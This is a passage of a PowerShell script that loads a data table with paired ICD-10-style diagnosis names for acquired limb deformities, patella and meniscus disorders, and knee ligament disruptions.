$DiagnosisList.Rows.Add("Other hammer toe(s) (acquired)","Other hammer toe(s) (acquired), unspecified foot") + $null = $DiagnosisList.Rows.Add("Other hammer toe(s) (acquired)","Other hammer toe(s) (acquired), right foot") + $null = $DiagnosisList.Rows.Add("Other hammer toe(s) (acquired)","Other hammer toe(s) (acquired), left foot") + $null = $DiagnosisList.Rows.Add("Other deformities of toe(s) (acquired)","Other deformities of toe(s) (acquired), right foot") + $null = $DiagnosisList.Rows.Add("Other deformities of toe(s) (acquired)","Other deformities of toe(s) (acquired), left foot") + $null = $DiagnosisList.Rows.Add("Other deformities of toe(s) (acquired)","Other deformities of toe(s) (acquired), unspecified foot") + $null = $DiagnosisList.Rows.Add("Acquired deformities of toe(s), unspecified","Acquired deformities of toe(s), unspecified, unspecified foot") + $null = $DiagnosisList.Rows.Add("Acquired deformities of toe(s), unspecified","Acquired deformities of toe(s), unspecified, right foot") + $null = $DiagnosisList.Rows.Add("Acquired deformities of toe(s), unspecified","Acquired deformities of toe(s), unspecified, left foot") + $null = $DiagnosisList.Rows.Add("Valgus deformity, not elsewhere classified","Valgus deformity, not elsewhere classified, unspecified site") + $null = $DiagnosisList.Rows.Add("Valgus deformity, not elsewhere classified, elbow","Valgus deformity, not elsewhere classified, right elbow") + $null = $DiagnosisList.Rows.Add("Valgus deformity, not elsewhere classified, elbow","Valgus deformity, not elsewhere classified, left elbow") + $null = $DiagnosisList.Rows.Add("Valgus deformity, not elsewhere classified, elbow","Valgus deformity, not elsewhere classified, unspecified elbow") + $null = $DiagnosisList.Rows.Add("Valgus deformity, not elsewhere classified, hip","Valgus deformity, not elsewhere classified, right hip") + $null = $DiagnosisList.Rows.Add("Valgus deformity, not elsewhere classified, hip","Valgus deformity, not elsewhere classified, left hip") + $null = $DiagnosisList.Rows.Add("Valgus deformity, not elsewhere classified, hip","Valgus deformity, not elsewhere classified, unspecified hip") + $null = $DiagnosisList.Rows.Add("Valgus deformity, not elsewhere classified, knee","Valgus deformity, not elsewhere classified, right knee") + $null = $DiagnosisList.Rows.Add("Valgus deformity, not elsewhere classified, knee","Valgus deformity, not elsewhere classified, left knee") + $null = $DiagnosisList.Rows.Add("Valgus deformity, not elsewhere classified, knee","Valgus deformity, not elsewhere classified, unspecified knee") + $null = $DiagnosisList.Rows.Add("Valgus deformity, not elsewhere classified, ankle","Valgus deformity, not elsewhere classified, right ankle") + $null = $DiagnosisList.Rows.Add("Valgus deformity, not elsewhere classified, ankle","Valgus deformity, not elsewhere classified, left ankle") + $null = $DiagnosisList.Rows.Add("Valgus deformity, not elsewhere classified, ankle","Valgus deformity, not elsewhere classified, unspecified ankle") + $null = $DiagnosisList.Rows.Add("Varus deformity, not elsewhere classified","Varus deformity, not elsewhere classified, unspecified site") + $null = $DiagnosisList.Rows.Add("Varus deformity, not elsewhere classified, elbow","Varus deformity, not elsewhere classified, right elbow") + $null = $DiagnosisList.Rows.Add("Varus deformity, not elsewhere classified, elbow","Varus deformity, not elsewhere classified, left elbow") + $null = $DiagnosisList.Rows.Add("Varus deformity, not elsewhere classified, elbow","Varus deformity, not elsewhere classified, unspecified elbow") + $null = $DiagnosisList.Rows.Add("Varus deformity, not elsewhere classified, hip","Varus deformity, not elsewhere classified, right hip") + $null = $DiagnosisList.Rows.Add("Varus deformity, not elsewhere classified, hip","Varus deformity, not elsewhere classified, left hip") + $null = $DiagnosisList.Rows.Add("Varus deformity, not elsewhere classified, hip","Varus deformity, not elsewhere classified, unspecified") + $null = $DiagnosisList.Rows.Add("Varus deformity, not elsewhere classified, knee","Varus deformity, not elsewhere classified, right knee") + $null = $DiagnosisList.Rows.Add("Varus deformity, not elsewhere classified, knee","Varus deformity, not elsewhere classified, left knee") + $null = $DiagnosisList.Rows.Add("Varus deformity, not elsewhere classified, knee","Varus deformity, not elsewhere classified, unspecified knee") + $null = $DiagnosisList.Rows.Add("Varus deformity, not elsewhere classified, ankle","Varus deformity, not elsewhere classified, right ankle") + $null = $DiagnosisList.Rows.Add("Varus deformity, not elsewhere classified, ankle","Varus deformity, not elsewhere classified, left ankle") + $null = $DiagnosisList.Rows.Add("Varus deformity, not elsewhere classified, ankle","Varus deformity, not elsewhere classified, unspecified ankle") + $null = $DiagnosisList.Rows.Add("Flexion deformity","Flexion deformity, unspecified site") + $null = $DiagnosisList.Rows.Add("Flexion deformity, shoulder","Flexion deformity, right shoulder") + $null = $DiagnosisList.Rows.Add("Flexion deformity, shoulder","Flexion deformity, left shoulder") + $null = $DiagnosisList.Rows.Add("Flexion deformity, shoulder","Flexion deformity, unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Flexion deformity, elbow","Flexion deformity, right elbow") + $null = $DiagnosisList.Rows.Add("Flexion deformity, elbow","Flexion deformity, left elbow") + $null = $DiagnosisList.Rows.Add("Flexion deformity, elbow","Flexion deformity, unspecified elbow") + $null = $DiagnosisList.Rows.Add("Flexion deformity, wrist","Flexion deformity, right wrist") + $null = $DiagnosisList.Rows.Add("Flexion deformity, wrist","Flexion deformity, left wrist") + $null = $DiagnosisList.Rows.Add("Flexion deformity, wrist","Flexion deformity, unspecified wrist") + $null = $DiagnosisList.Rows.Add("Flexion deformity, finger joints","Flexion deformity, right finger joints") + $null = $DiagnosisList.Rows.Add("Flexion deformity, finger joints","Flexion deformity, left finger joints") + $null = $DiagnosisList.Rows.Add("Flexion deformity, finger joints","Flexion deformity, unspecified finger joints") + $null = $DiagnosisList.Rows.Add("Flexion deformity, hip","Flexion deformity, right hip") + $null = $DiagnosisList.Rows.Add("Flexion deformity, hip","Flexion deformity, left hip") + $null = $DiagnosisList.Rows.Add("Flexion deformity, hip","Flexion deformity, unspecified hip") + $null = $DiagnosisList.Rows.Add("Flexion deformity, knee","Flexion deformity, right knee") + $null = $DiagnosisList.Rows.Add("Flexion deformity, knee","Flexion deformity, left knee") + $null = $DiagnosisList.Rows.Add("Flexion deformity, knee","Flexion deformity, unspecified knee") + $null = $DiagnosisList.Rows.Add("Flexion deformity, ankle and toes","Flexion deformity, right ankle and toes") + $null = $DiagnosisList.Rows.Add("Flexion deformity, ankle and toes","Flexion deformity, left ankle and toes") + $null = $DiagnosisList.Rows.Add("Flexion deformity, ankle and toes","Flexion deformity, unspecified ankle and toes") + $null = $DiagnosisList.Rows.Add("Wrist drop (acquired)","Wrist drop, right wrist") + $null = $DiagnosisList.Rows.Add("Wrist drop (acquired)","Wrist drop, left wrist") + $null = $DiagnosisList.Rows.Add("Wrist drop (acquired)","Wrist drop, unspecified wrist") + $null = $DiagnosisList.Rows.Add("Foot drop (acquired)","Foot drop, right foot") + $null = $DiagnosisList.Rows.Add("Foot drop (acquired)","Foot drop, left foot") + $null = $DiagnosisList.Rows.Add("Foot drop (acquired)","Foot drop, unspecified foot") + $null = $DiagnosisList.Rows.Add("Flat foot [pes planus] (acquired)","Flat foot [pes planus] (acquired), unspecified foot") + $null = $DiagnosisList.Rows.Add("Flat foot [pes planus] (acquired)","Flat foot [pes planus] (acquired), right foot") + $null = $DiagnosisList.Rows.Add("Flat foot [pes planus] (acquired)","Flat foot [pes planus] (acquired), left foot") + $null = $DiagnosisList.Rows.Add("Acquired clawhand","Acquired clawhand, right hand") + $null = $DiagnosisList.Rows.Add("Acquired clawhand","Acquired clawhand, left hand") + $null = $DiagnosisList.Rows.Add("Acquired clawhand","Acquired clawhand, unspecified hand") + $null = $DiagnosisList.Rows.Add("Acquired clubhand","Acquired clubhand, right hand") + $null = $DiagnosisList.Rows.Add("Acquired clubhand","Acquired clubhand, left hand") + $null = $DiagnosisList.Rows.Add("Acquired clubhand","Acquired clubhand, unspecified hand") + $null = $DiagnosisList.Rows.Add("Acquired clawfoot","Acquired clawfoot, right foot") + $null = $DiagnosisList.Rows.Add("Acquired clawfoot","Acquired clawfoot, left foot") + $null = $DiagnosisList.Rows.Add("Acquired clawfoot","Acquired clawfoot, unspecified foot") + $null = $DiagnosisList.Rows.Add("Acquired clubfoot","Acquired clubfoot, right foot") + $null = $DiagnosisList.Rows.Add("Acquired clubfoot","Acquired clubfoot, left foot") + $null = $DiagnosisList.Rows.Add("Acquired clubfoot","Acquired clubfoot, unspecified foot") + $null = $DiagnosisList.Rows.Add("Bunion","Bunion of right foot") + $null = $DiagnosisList.Rows.Add("Bunion","Bunion of left foot") + $null = $DiagnosisList.Rows.Add("Bunion","Bunion of unspecified foot") + $null = $DiagnosisList.Rows.Add("Bunionette","Bunionette of right foot") + $null = $DiagnosisList.Rows.Add("Bunionette","Bunionette of left foot") + $null = $DiagnosisList.Rows.Add("Bunionette","Bunionette of unspecified foot") + $null = $DiagnosisList.Rows.Add("Other acquired deformities of foot","Other acquired deformities of right foot") + $null = $DiagnosisList.Rows.Add("Other acquired deformities of foot","Other acquired deformities of left foot") + $null = $DiagnosisList.Rows.Add("Other acquired deformities of foot","Other acquired deformities of unspecified foot") + $null = $DiagnosisList.Rows.Add("Unequal limb length (acquired)","Unequal limb length (acquired), unspecified site") + $null = $DiagnosisList.Rows.Add("Unequal limb length (acquired), humerus","Unequal limb length (acquired), right humerus") + $null = $DiagnosisList.Rows.Add("Unequal limb length (acquired), humerus","Unequal limb length (acquired), left humerus") + $null = $DiagnosisList.Rows.Add("Unequal limb length (acquired), humerus","Unequal limb length (acquired), unspecified humerus") + $null = $DiagnosisList.Rows.Add("Unequal limb length (acquired), ulna and radius","Unequal limb length (acquired), right ulna") + $null = $DiagnosisList.Rows.Add("Unequal limb length (acquired), ulna and radius","Unequal limb length (acquired), left ulna") + $null = $DiagnosisList.Rows.Add("Unequal limb length (acquired), ulna and radius","Unequal limb length (acquired), right radius") + $null = $DiagnosisList.Rows.Add("Unequal limb length (acquired), ulna and radius","Unequal limb length (acquired), left radius") + $null = $DiagnosisList.Rows.Add("Unequal limb length (acquired), ulna and radius","Unequal limb length (acquired), unspecified ulna and radius") + $null = $DiagnosisList.Rows.Add("Unequal limb length (acquired), femur","Unequal limb length (acquired), right femur") + $null = $DiagnosisList.Rows.Add("Unequal limb length (acquired), femur","Unequal limb length (acquired), left femur") + $null = $DiagnosisList.Rows.Add("Unequal limb length (acquired), femur","Unequal limb length (acquired), unspecified femur") + $null = $DiagnosisList.Rows.Add("Unequal limb length (acquired), tibia and fibula","Unequal limb length (acquired), right tibia") + $null = $DiagnosisList.Rows.Add("Unequal limb length (acquired), tibia and fibula","Unequal limb length (acquired), left tibia") + $null = $DiagnosisList.Rows.Add("Unequal limb length (acquired), tibia and fibula","Unequal limb length (acquired), right fibula") + $null = $DiagnosisList.Rows.Add("Unequal limb length (acquired), tibia and fibula","Unequal limb length (acquired), left fibula") + $null = $DiagnosisList.Rows.Add("Unequal limb length (acquired), tibia and fibula","Unequal limb length (acquired), unspecified tibia and fibula") + $null = $DiagnosisList.Rows.Add("Other specified acquired deformities of limbs","Other specified acquired deformities of unspecified limb") + $null = $DiagnosisList.Rows.Add("Other specified acquired deformities of upper arm","Other specified acquired deformities of right upper arm") + $null = $DiagnosisList.Rows.Add("Other specified acquired deformities of upper arm","Other specified acquired deformities of left upper arm") + $null = $DiagnosisList.Rows.Add("Other specified acquired deformities of upper arm","Other specified acquired deformities of unspecified upper arm") + $null = $DiagnosisList.Rows.Add("Other specified acquired deformities of forearm","Other specified acquired deformities of right forearm") + $null = $DiagnosisList.Rows.Add("Other specified acquired deformities of forearm","Other specified acquired deformities of left forearm") + $null = $DiagnosisList.Rows.Add("Other specified acquired deformities of forearm","Other specified acquired deformities of unspecified forearm") + $null = $DiagnosisList.Rows.Add("Other specified acquired deformities of thigh","Other specified acquired deformities of right thigh") + $null = $DiagnosisList.Rows.Add("Other specified acquired deformities of thigh","Other specified acquired deformities of left thigh") + $null = $DiagnosisList.Rows.Add("Other specified acquired deformities of thigh","Other specified acquired deformities of unspecified thigh") + $null = $DiagnosisList.Rows.Add("Other specified acquired deformities of lower leg","Other specified acquired deformities of right lower leg") + $null = $DiagnosisList.Rows.Add("Other specified acquired deformities of lower leg","Other specified acquired deformities of left lower leg") + $null = $DiagnosisList.Rows.Add("Other specified acquired deformities of lower leg","Other specified acquired deformities of unspecified lower leg") + $null = $DiagnosisList.Rows.Add("Unspecified acquired deformity of limb and hand","Unspecified acquired deformity of unspecified limb") + $null = $DiagnosisList.Rows.Add("Unspecified acquired deformity of upper arm","Unspecified acquired deformity of right upper arm") + $null = $DiagnosisList.Rows.Add("Unspecified acquired deformity of upper arm","Unspecified acquired deformity of left upper arm") + $null = $DiagnosisList.Rows.Add("Unspecified acquired deformity of upper arm","Unspecified acquired deformity of unspecified upper arm") + $null = $DiagnosisList.Rows.Add("Unspecified acquired deformity of forearm","Unspecified acquired deformity of right forearm") + $null = $DiagnosisList.Rows.Add("Unspecified acquired deformity of forearm","Unspecified acquired deformity of left forearm") + $null = $DiagnosisList.Rows.Add("Unspecified acquired deformity of forearm","Unspecified acquired deformity of unspecified forearm") + $null = $DiagnosisList.Rows.Add("Unspecified acquired deformity of hand","Unspecified acquired deformity of hand, right hand") + $null = $DiagnosisList.Rows.Add("Unspecified acquired deformity of hand","Unspecified acquired deformity of hand, left hand") + $null = $DiagnosisList.Rows.Add("Unspecified acquired deformity of hand","Unspecified acquired deformity of hand, unspecified hand") + $null = $DiagnosisList.Rows.Add("Unspecified acquired deformity of thigh","Unspecified acquired deformity of right thigh") + $null = $DiagnosisList.Rows.Add("Unspecified acquired deformity of thigh","Unspecified acquired deformity of left thigh") + $null = $DiagnosisList.Rows.Add("Unspecified acquired deformity of thigh","Unspecified acquired deformity of unspecified thigh") + $null = $DiagnosisList.Rows.Add("Unspecified acquired deformity of lower leg","Unspecified acquired deformity of right lower leg") + $null = $DiagnosisList.Rows.Add("Unspecified acquired deformity of lower leg","Unspecified acquired deformity of left lower leg") + $null = $DiagnosisList.Rows.Add("Unspecified acquired deformity of lower leg","Unspecified acquired deformity of unspecified lower leg") + $null = $DiagnosisList.Rows.Add("Recurrent dislocation of patella","Recurrent dislocation of patella, unspecified knee") + $null = $DiagnosisList.Rows.Add("Recurrent dislocation of patella","Recurrent dislocation of patella, right knee") + $null = $DiagnosisList.Rows.Add("Recurrent dislocation of patella","Recurrent dislocation of patella, left knee") + $null = $DiagnosisList.Rows.Add("Recurrent subluxation of patella","Recurrent subluxation of patella, unspecified knee") + $null = $DiagnosisList.Rows.Add("Recurrent subluxation of patella","Recurrent subluxation of patella, right knee") + $null = $DiagnosisList.Rows.Add("Recurrent subluxation of patella","Recurrent subluxation of patella, left knee") + $null = $DiagnosisList.Rows.Add("Patellofemoral disorders","Patellofemoral disorders, right knee") + $null = $DiagnosisList.Rows.Add("Patellofemoral disorders","Patellofemoral disorders, left knee") + $null = $DiagnosisList.Rows.Add("Patellofemoral disorders","Patellofemoral disorders, unspecified knee") + $null = $DiagnosisList.Rows.Add("Other derangements of patella","Other derangements of patella, right knee") + $null = $DiagnosisList.Rows.Add("Other derangements of patella","Other derangements of patella, left knee") + $null = $DiagnosisList.Rows.Add("Other derangements of patella","Other derangements of patella, unspecified knee") + $null = $DiagnosisList.Rows.Add("Chondromalacia patellae","Chondromalacia patellae, unspecified knee") + $null = $DiagnosisList.Rows.Add("Chondromalacia patellae","Chondromalacia patellae, right knee") + $null = $DiagnosisList.Rows.Add("Chondromalacia patellae","Chondromalacia patellae, left knee") + $null = $DiagnosisList.Rows.Add("Other disorders of patella","Other disorders of patella, right knee") + $null = $DiagnosisList.Rows.Add("Other disorders of patella","Other disorders of patella, left knee") + $null = $DiagnosisList.Rows.Add("Other disorders of patella","Other disorders of patella, unspecified knee") + $null = $DiagnosisList.Rows.Add("Unspecified disorder of patella","Unspecified disorder of patella, unspecified knee") + $null = $DiagnosisList.Rows.Add("Unspecified disorder of patella","Unspecified disorder of patella, right knee") + $null = $DiagnosisList.Rows.Add("Unspecified disorder of patella","Unspecified disorder of patella, left knee") + $null = $DiagnosisList.Rows.Add("Cystic meniscus, unspecified meniscus","Cystic meniscus, unspecified lateral meniscus, right knee") + $null = $DiagnosisList.Rows.Add("Cystic meniscus, unspecified meniscus","Cystic meniscus, unspecified lateral meniscus, left knee") + $null = $DiagnosisList.Rows.Add("Cystic meniscus, unspecified meniscus","Cystic meniscus, unspecified lateral meniscus, unspecified knee") + $null = $DiagnosisList.Rows.Add("Cystic meniscus, unspecified meniscus","Cystic meniscus, unspecified medial meniscus, right knee") + $null = $DiagnosisList.Rows.Add("Cystic meniscus, unspecified meniscus","Cystic meniscus, unspecified medial meniscus, left knee") + $null = $DiagnosisList.Rows.Add("Cystic meniscus, unspecified meniscus","Cystic meniscus, unspecified medial meniscus, unspecified knee") + $null = $DiagnosisList.Rows.Add("Cystic meniscus, unspecified meniscus","Cystic meniscus, unspecified meniscus, right knee") + $null = $DiagnosisList.Rows.Add("Cystic meniscus, unspecified meniscus","Cystic meniscus, unspecified meniscus, left knee") + $null = $DiagnosisList.Rows.Add("Cystic meniscus, unspecified meniscus","Cystic meniscus, unspecified meniscus, unspecified knee") + $null = $DiagnosisList.Rows.Add("Cystic meniscus, anterior horn of medial meniscus","Cystic meniscus, anterior horn of medial meniscus, right knee") + $null = $DiagnosisList.Rows.Add("Cystic meniscus, anterior horn of medial meniscus","Cystic meniscus, anterior horn of medial meniscus, left knee") + $null = $DiagnosisList.Rows.Add("Cystic meniscus, anterior horn of medial meniscus","Cystic meniscus, anterior horn of medial meniscus, unspecified knee") + $null = $DiagnosisList.Rows.Add("Cystic meniscus, posterior horn of medial meniscus","Cystic meniscus, posterior horn of medial meniscus, right knee") + $null = $DiagnosisList.Rows.Add("Cystic meniscus, posterior horn of medial meniscus","Cystic meniscus, posterior horn of medial meniscus, left knee") + $null = $DiagnosisList.Rows.Add("Cystic meniscus, posterior horn of medial meniscus","Cystic meniscus, posterior horn of medial meniscus, unspecified knee") + $null = $DiagnosisList.Rows.Add("Cystic meniscus, other medial meniscus","Cystic meniscus, other medial meniscus, right knee") + $null = $DiagnosisList.Rows.Add("Cystic meniscus, other medial meniscus","Cystic meniscus, other medial meniscus, left knee") + $null = $DiagnosisList.Rows.Add("Cystic meniscus, other medial meniscus","Cystic meniscus, other medial meniscus, unspecified knee") + $null = $DiagnosisList.Rows.Add("Cystic meniscus, anterior horn of lateral meniscus","Cystic meniscus, anterior horn of lateral meniscus, right knee") + $null = $DiagnosisList.Rows.Add("Cystic meniscus, anterior horn of lateral meniscus","Cystic meniscus, anterior horn of lateral meniscus, left knee") + $null = $DiagnosisList.Rows.Add("Cystic meniscus, anterior horn of lateral meniscus","Cystic meniscus, anterior horn of lateral meniscus, unspecified knee") + $null = $DiagnosisList.Rows.Add("Cystic meniscus, posterior horn of lateral meniscus","Cystic meniscus, posterior horn of lateral meniscus, right knee") + $null = $DiagnosisList.Rows.Add("Cystic meniscus, posterior horn of lateral meniscus","Cystic meniscus, posterior horn of lateral meniscus, left knee") + $null = $DiagnosisList.Rows.Add("Cystic meniscus, posterior horn of lateral meniscus","Cystic meniscus, posterior horn of lateral meniscus, unspecified knee") + $null = $DiagnosisList.Rows.Add("Cystic meniscus, other lateral meniscus","Cystic meniscus, other lateral meniscus, right knee") + $null = $DiagnosisList.Rows.Add("Cystic meniscus, other lateral meniscus","Cystic meniscus, other lateral meniscus, left knee") + $null = $DiagnosisList.Rows.Add("Cystic meniscus, other lateral meniscus","Cystic meniscus, other lateral meniscus, unspecified knee") + $null = $DiagnosisList.Rows.Add("Derangement of unspecified meniscus due to old tear or injury","Derangement of unspecified lateral meniscus due to old tear or injury, right knee") + $null = $DiagnosisList.Rows.Add("Derangement of unspecified meniscus due to old tear or injury","Derangement of unspecified lateral meniscus due to old tear or injury, left knee") + $null = $DiagnosisList.Rows.Add("Derangement of unspecified meniscus due to old tear or injury","Derangement of unspecified lateral meniscus due to old tear or injury, unspecified knee") + $null = $DiagnosisList.Rows.Add("Derangement of unspecified meniscus due to old tear or injury","Derangement of unspecified medial meniscus due to old tear or injury, right knee") + $null = $DiagnosisList.Rows.Add("Derangement of unspecified meniscus due to old tear or injury","Derangement of unspecified medial meniscus due to old tear or injury, left knee") + $null = $DiagnosisList.Rows.Add("Derangement of unspecified meniscus due to old tear or injury","Derangement of unspecified medial meniscus due to old tear or injury, unspecified knee") + $null = $DiagnosisList.Rows.Add("Derangement of unspecified meniscus due to old tear or injury","Derangement of unspecified meniscus due to old tear or injury, right knee") + $null = $DiagnosisList.Rows.Add("Derangement of unspecified meniscus due to old tear or injury","Derangement of unspecified meniscus due to old tear or injury, left knee") + $null = $DiagnosisList.Rows.Add("Derangement of unspecified meniscus due to old tear or injury","Derangement of unspecified meniscus due to old tear or injury, unspecified knee") + $null = $DiagnosisList.Rows.Add("Derangement of anterior horn of medial meniscus due to old tear or injury","Derangement of anterior horn of medial meniscus due to old tear or injury, right knee") + $null = $DiagnosisList.Rows.Add("Derangement of anterior horn of medial meniscus due to old tear or injury","Derangement of anterior horn of medial meniscus due to old tear or injury, left knee") + $null = $DiagnosisList.Rows.Add("Derangement of anterior horn of medial meniscus due to old tear or injury","Derangement of anterior horn of medial meniscus due to old tear or injury, unspecified knee") + $null = $DiagnosisList.Rows.Add("Derangement of posterior horn of medial meniscus due to old tear or injury","Derangement of posterior horn of medial meniscus due to old tear or injury, right knee") + $null = $DiagnosisList.Rows.Add("Derangement of posterior horn of medial meniscus due to old tear or injury","Derangement of posterior horn of medial meniscus due to old tear or injury, left knee") + $null = $DiagnosisList.Rows.Add("Derangement of posterior horn of medial meniscus due to old tear or injury","Derangement of posterior horn of medial meniscus due to old tear or injury, unspecified knee") + $null = $DiagnosisList.Rows.Add("Derangement of other medial meniscus due to old tear or injury","Derangement of other medial meniscus due to old tear or injury, right knee") + $null = $DiagnosisList.Rows.Add("Derangement of other medial meniscus due to old tear or injury","Derangement of other medial meniscus due to old tear or injury, left knee") + $null = $DiagnosisList.Rows.Add("Derangement of other medial meniscus due to old tear or injury","Derangement of other medial meniscus due to old tear or injury, unspecified knee") + $null = $DiagnosisList.Rows.Add("Derangement of anterior horn of lateral meniscus due to old tear or injury","Derangement of anterior horn of lateral meniscus due to old tear or injury, right knee") + $null = $DiagnosisList.Rows.Add("Derangement of anterior horn of lateral meniscus due to old tear or injury","Derangement of anterior horn of lateral meniscus due to old tear or injury, left knee") + $null = $DiagnosisList.Rows.Add("Derangement of anterior horn of lateral meniscus due to old tear or injury","Derangement of anterior horn of lateral meniscus due to old tear or injury, unspecified knee") + $null = $DiagnosisList.Rows.Add("Derangement of posterior horn of lateral meniscus due to old tear or injury","Derangement of posterior horn of lateral meniscus due to old tear or injury, right knee") + $null = $DiagnosisList.Rows.Add("Derangement of posterior horn of lateral meniscus due to old tear or injury","Derangement of posterior horn of lateral meniscus due to old tear or injury, left knee") + $null = $DiagnosisList.Rows.Add("Derangement of posterior horn of lateral meniscus due to old tear or injury","Derangement of posterior horn of lateral meniscus due to old tear or injury, unspecified knee") + $null = $DiagnosisList.Rows.Add("Derangement of other lateral meniscus due to old tear or injury","Derangement of other lateral meniscus due to old tear or injury, right knee") + $null = $DiagnosisList.Rows.Add("Derangement of other lateral meniscus due to old tear or injury","Derangement of other lateral meniscus due to old tear or injury, left knee") + $null = $DiagnosisList.Rows.Add("Derangement of other lateral meniscus due to old tear or injury","Derangement of other lateral meniscus due to old tear or injury, unspecified knee") + $null = $DiagnosisList.Rows.Add("Other meniscus derangements, unspecified meniscus","Other meniscus derangements, unspecified lateral meniscus, right knee") + $null = $DiagnosisList.Rows.Add("Other meniscus derangements, unspecified meniscus","Other meniscus derangements, unspecified lateral meniscus, left knee") + $null = $DiagnosisList.Rows.Add("Other meniscus derangements, unspecified meniscus","Other meniscus derangements, unspecified lateral meniscus, unspecified knee") + $null = $DiagnosisList.Rows.Add("Other meniscus derangements, unspecified meniscus","Other meniscus derangements, unspecified medial meniscus, right knee") + $null = $DiagnosisList.Rows.Add("Other meniscus derangements, unspecified meniscus","Other meniscus derangements, unspecified medial meniscus, left knee") + $null = $DiagnosisList.Rows.Add("Other meniscus derangements, unspecified meniscus","Other meniscus derangements, unspecified medial meniscus, unspecified knee") + $null = $DiagnosisList.Rows.Add("Other meniscus derangements, unspecified meniscus","Other meniscus derangements, unspecified meniscus, right knee") + $null = $DiagnosisList.Rows.Add("Other meniscus derangements, unspecified meniscus","Other meniscus derangements, unspecified meniscus, left knee") + $null = $DiagnosisList.Rows.Add("Other meniscus derangements, unspecified meniscus","Other meniscus derangements, unspecified meniscus, unspecified knee") + $null = $DiagnosisList.Rows.Add("Other meniscus derangements, anterior horn of medial meniscus","Other meniscus derangements, anterior horn of medial meniscus, right knee") + $null = $DiagnosisList.Rows.Add("Other meniscus derangements, anterior horn of medial meniscus","Other meniscus derangements, anterior horn of medial meniscus, left knee") + $null = $DiagnosisList.Rows.Add("Other meniscus derangements, anterior horn of medial meniscus","Other meniscus derangements, anterior horn of medial meniscus, unspecified knee") + $null = $DiagnosisList.Rows.Add("Other meniscus derangements, posterior horn of medial meniscus","Other meniscus derangements, posterior horn of medial meniscus, right knee") + $null = $DiagnosisList.Rows.Add("Other meniscus derangements, posterior horn of medial meniscus","Other meniscus derangements, posterior horn of medial meniscus, left knee") + $null = $DiagnosisList.Rows.Add("Other meniscus derangements, posterior horn of medial meniscus","Other meniscus derangements, posterior horn of medial meniscus, unspecified knee") + $null = $DiagnosisList.Rows.Add("Other meniscus derangements, other medial meniscus","Other meniscus derangements, other medial meniscus, right knee") + $null = $DiagnosisList.Rows.Add("Other meniscus derangements, other medial meniscus","Other meniscus derangements, other medial meniscus, left knee") + $null = $DiagnosisList.Rows.Add("Other meniscus derangements, other medial meniscus","Other meniscus derangements, other medial meniscus, unspecified knee") + $null = $DiagnosisList.Rows.Add("Other meniscus derangements, anterior horn of lateral meniscus","Other meniscus derangements, anterior horn of lateral meniscus, right knee") + $null = $DiagnosisList.Rows.Add("Other meniscus derangements, anterior horn of lateral meniscus","Other meniscus derangements, anterior horn of lateral meniscus, left knee") + $null = $DiagnosisList.Rows.Add("Other meniscus derangements, anterior horn of lateral meniscus","Other meniscus derangements, anterior horn of lateral meniscus, unspecified knee") + $null = $DiagnosisList.Rows.Add("Other meniscus derangements, posterior horn of lateral meniscus","Other meniscus derangements, posterior horn of lateral meniscus, right knee") + $null = $DiagnosisList.Rows.Add("Other meniscus derangements, posterior horn of lateral meniscus","Other meniscus derangements, posterior horn of lateral meniscus, left knee") + $null = $DiagnosisList.Rows.Add("Other meniscus derangements, posterior horn of lateral meniscus","Other meniscus derangements, posterior horn of lateral meniscus, unspecified knee") + $null = $DiagnosisList.Rows.Add("Other meniscus derangements, other lateral meniscus","Other meniscus derangements, other lateral meniscus, right knee") + $null = $DiagnosisList.Rows.Add("Other meniscus derangements, other lateral meniscus","Other meniscus derangements, other lateral meniscus, left knee") + $null = $DiagnosisList.Rows.Add("Other meniscus derangements, other lateral meniscus","Other meniscus derangements, other lateral meniscus, unspecified knee") + $null = $DiagnosisList.Rows.Add("Loose body in knee","Loose body in knee, unspecified knee") + $null = $DiagnosisList.Rows.Add("Loose body in knee","Loose body in knee, right knee") + $null = $DiagnosisList.Rows.Add("Loose body in knee","Loose body in knee, left knee") + $null = $DiagnosisList.Rows.Add("Chronic instability of knee","Chronic instability of knee, unspecified knee") + $null = $DiagnosisList.Rows.Add("Chronic instability of knee","Chronic instability of knee, right knee") + $null = $DiagnosisList.Rows.Add("Chronic instability of knee","Chronic instability of knee, left knee") + $null = $DiagnosisList.Rows.Add("Other spontaneous disruption of unspecified ligament of knee","Other spontaneous disruption of unspecified ligament of right knee") + $null = $DiagnosisList.Rows.Add("Other spontaneous disruption of unspecified ligament of knee","Other spontaneous disruption of unspecified ligament of left knee") + $null = $DiagnosisList.Rows.Add("Other spontaneous disruption of unspecified ligament of knee","Other spontaneous disruption of unspecified ligament of unspecified knee") + $null = $DiagnosisList.Rows.Add("Other spontaneous disruption of anterior cruciate ligament of knee","Other spontaneous disruption of anterior cruciate ligament of right knee") + $null = $DiagnosisList.Rows.Add("Other spontaneous disruption of anterior cruciate ligament of knee","Other spontaneous disruption of anterior cruciate ligament of left knee") + $null = $DiagnosisList.Rows.Add("Other spontaneous disruption of anterior cruciate ligament of knee","Other spontaneous disruption of anterior cruciate ligament of unspecified knee") + $null = $DiagnosisList.Rows.Add("Other spontaneous disruption of posterior cruciate ligament of knee","Other spontaneous disruption of posterior cruciate ligament of right knee") + $null = $DiagnosisList.Rows.Add("Other spontaneous disruption of posterior cruciate ligament of knee","Other spontaneous disruption of posterior cruciate ligament of left knee") + $null = $DiagnosisList.Rows.Add("Other spontaneous disruption of posterior cruciate ligament of knee","Other spontaneous disruption of posterior cruciate ligament of unspecified knee") + $null = $DiagnosisList.Rows.Add("Other spontaneous disruption of medial collateral ligament of knee","Other spontaneous disruption of medial collateral ligament of right knee") + $null = $DiagnosisList.Rows.Add("Other spontaneous disruption of medial collateral ligament of knee","Other spontaneous disruption of medial collateral ligament of left knee") + $null = $DiagnosisList.Rows.Add("Other spontaneous disruption of medial collateral ligament of knee","Other spontaneous disruption of medial collateral ligament of unspecified knee") + $null = $DiagnosisList.Rows.Add("Other spontaneous disruption of lateral collateral ligament of knee","Other spontaneous disruption of lateral collateral ligament of right knee") + $null = $DiagnosisList.Rows.Add("Other spontaneous disruption of lateral collateral ligament of knee","Other spontaneous disruption of lateral collateral ligament of left knee") + $null = $DiagnosisList.Rows.Add("Other spontaneous disruption of lateral collateral ligament of knee","Other spontaneous disruption of lateral collateral ligament of unspecified knee") + $null = $DiagnosisList.Rows.Add("Other spontaneous disruption of capsular ligament of knee","Other spontaneous disruption of capsular ligament of right knee") + $null = $DiagnosisList.Rows.Add("Other spontaneous disruption of capsular ligament of knee","Other spontaneous disruption of capsular ligament of left knee") + $null = $DiagnosisList.Rows.Add("Other spontaneous disruption of 